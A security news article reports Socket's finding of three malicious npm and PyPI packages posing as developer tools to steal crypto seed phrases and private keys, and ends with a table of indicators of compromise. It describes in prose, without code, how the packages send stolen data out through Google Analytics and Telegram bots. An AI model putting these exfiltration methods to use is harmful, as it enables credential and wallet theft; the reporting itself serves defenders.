Wednesday, May 28, 2025
Homecyber securityThreat Actors Leverage npm and PyPI with Impersonated Dev Tools for Credential...

Threat Actors Leverage npm and PyPI with Impersonated Dev Tools for Credential Theft

Published on

SIEM as a Service

Follow Us on Google News

The Socket Threat Research Team has unearthed a trio of malicious packages, two hosted on the Python Package Index (PyPI) and one on the npm registry, designed to silently pilfer cryptocurrency secrets, including mnemonic seed phrases and private keys.

Released between 2021 and 2024, these packages, under the guise of harmless developer tools, have been downloaded thousands of times, showcasing a growing trend in software supply chain attacks targeting open-source ecosystems.

Subtle Subversion in Open Source

The npm package react-native-scrollpageviewtest, masquerading as a page-scrolling helper, has been downloaded 1215 times.

- Advertisement - Google News

Its modus operandi involves an intricate combination of obfuscation and evasion techniques.

Once installed, it dynamically loads the host React Native wallet engine to extract sensitive data, which is then encoded in Base64 and stealthily exfiltrated to the control server using Google Analytics as a seemingly innocuous endpoint for data transmission.

This method not only evades detection but also leverages the trust placed in Google’s analytics services.

On PyPI, web3x and herewalletbot represent similar tactics but with nuanced delivery mechanisms.

Web3x, appearing as an Ethereum balance checker, has gained over 3400 downloads.

It tricks users into providing their seed phrases by offering to check wallet balances and subsequently sends the stolen credentials to a Telegram bot controlled by the attackers.

Herewalletbot, with 3425 downloads, automates the process even further by guiding users through a Telegram chat interface where they are prompted to enter their mnemonic seed phrase, which is then harvested without their knowledge.

The Deceptive Dance with Developers

According to the Report, these packages illustrate the sophistication and cunning nature of current cyber threats.

By embedding themselves into development tools and workflows, they position themselves to intercept the most sensitive information, leveraging the inherent trust developers place in open-source packages.

This breach not only compromises individual developers but poses systemic risks to organizations relying on these ecosystems for software development.

The ongoing presence of these packages on npm and PyPI until recently highlights a critical need for enhanced security protocols within the software supply chain.

Developers and organizations must adopt proactive security measures like source-code review, runtime behavior monitoring, and dependency analysis to safeguard against such threats.

This discovery serves as a stark reminder of the critical importance of vigilance in software component usage.

Developers are urged to never share their mnemonic seed phrase and private keys under any circumstances, as these are the keys to their digital assets.

Any package requesting such information should be immediately flagged as suspicious and reported.

Indicators of Compromise (IOCs)

Malicious PackageAliasDownloadsEmail/Endpoint
react-native-scrollpageviewtesttwoplus1,215twoplusten@163[.]com
web3xtonymevbots3,405xeallmail@mitico[.]org
herewalletbotvannszs3,425bevansatria@gmail[.]com, @herewalletbot, hxxps://web[.]telegram[.]org/k/#@herewalletbot

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

Threat Actors Use Fake DocuSign Notifications to Steal Corporate Data

DocuSign has emerged as a cornerstone for over 1.6 million customers worldwide, including 95%...

Government Calls on Organizations to Adopt SIEM and SOAR Solutions

In a landmark initiative, international cybersecurity agencies have released a comprehensive series of publications...

WordPress TI WooCommerce Wishlist Plugin Flaw Puts Over 100,000 Websites at Risk of Cyberattack

A severe security flaw has been identified in the TI WooCommerce Wishlist plugin, a...

Microsoft Alerts on Void Blizzard Hackers Targeting Telecommunications and IT Sectors

Microsoft Threat Intelligence Center (MSTIC) has issued a critical warning about a cluster of...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Threat Actors Use Fake DocuSign Notifications to Steal Corporate Data

DocuSign has emerged as a cornerstone for over 1.6 million customers worldwide, including 95%...

Government Calls on Organizations to Adopt SIEM and SOAR Solutions

In a landmark initiative, international cybersecurity agencies have released a comprehensive series of publications...

WordPress TI WooCommerce Wishlist Plugin Flaw Puts Over 100,000 Websites at Risk of Cyberattack

A severe security flaw has been identified in the TI WooCommerce Wishlist plugin, a...